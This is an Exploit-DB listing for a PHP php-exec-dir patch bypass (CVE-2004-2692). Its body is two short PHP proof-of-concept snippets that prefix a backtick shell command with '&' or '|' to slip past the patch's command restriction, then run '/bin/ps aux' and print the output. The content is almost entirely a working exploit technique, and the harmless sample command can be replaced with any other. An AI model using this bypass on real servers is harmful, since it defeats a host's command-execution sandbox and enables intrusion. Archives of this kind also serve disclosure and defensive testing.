PHP php-exec-dir Patch Command Access Restriction Bypass

2004-08-08T00:00:00
ID EDB-ID:384
Type exploitdb
Reporter VeNoMouS
Modified 2004-08-08T00:00:00

Description

PHP (php-exec-dir) Patch Command Access Restriction Bypass. CVE-2004-2692. Webapps exploit for php platform

                                        
                                            <?php 
$blah = `& /bin/ps aux`; 
echo nl2br($blah); 
?> 

<?php 
$blah = `| /bin/ps aux`; 
echo nl2br($blah); 
?> 


# milw0rm.com [2004-08-08]